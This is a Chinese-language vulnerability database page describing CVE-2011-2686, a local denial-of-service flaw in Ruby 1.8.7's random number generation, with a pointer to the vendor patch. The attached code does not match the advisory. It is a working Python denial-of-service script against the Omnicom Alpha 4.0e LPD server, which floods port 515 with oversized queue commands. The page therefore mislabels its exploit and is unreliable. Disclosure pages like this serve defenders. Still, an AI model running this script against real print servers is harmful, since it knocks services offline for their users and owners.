Ruby随机数字生成本地拒绝服务漏洞

2011-08-0600:00:00

Root

www.seebug.org

0.005 Low

EPSS

Percentile

73.5%

JSON

BUGTRAQ ID: 49015
CVE ID: CVE-2011-2686

Ruby是一种功能强大的面向对象的脚本语言。

Ruby在处理随机数字生成的实现上存在本地拒绝服务漏洞，本地攻击者可利用此漏洞造成拒绝服务。

Yukihiro Matsumoto Ruby 1.8.7 x
厂商补丁：

Yukihiro Matsumoto

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.ruby-lang.org/


                                                #!/usr/bin/python
#Title: Omnicom Alpha 4.0e LPD Server DoS
#Author: Craig Freyman (@cd1zz)
#Software Download: http://www.omnicomtech.com/download/bin/lpd.exe
#Tested on: Windows XP SP3 (English), Server 2003 SP2 (English)
#Dates: Bug Found 7/27/2011, Vendor Notified 8/1/2011, Vendor Responded 8/2/2011, Vendor approved release 8/3/2011
#Notes: For this exploit to work, you must know the name of a printer queue on the server. 

import socket,sys,time

if len(sys.argv) &lt; 3:
	print &quot;[-]Usage: %s &lt;target addr&gt; &lt;queue name&gt;&quot; % sys.argv[0]
	sys.exit(0)

target = sys.argv[1]
queue = sys.argv[2]

counter = 1
crash = &quot;\x41&quot; * 7500

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
	while counter&lt;=50:
		print &quot;[*] Left jab &quot;+str(counter)+&quot; times.&quot;
		s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect((target,515))
		s.send(&quot;\x02&quot;+queue+&quot; &quot;+crash+&quot;LF&quot;)
		time.sleep(.25)
		counter+=1
except:
    	print &quot;[-] &quot;+target+&quot; has been knocked out with a right hook!&quot;
    	sys.exit(0)

0.005 Low

EPSS

Percentile

73.5%

JSON

Related for SSV:20813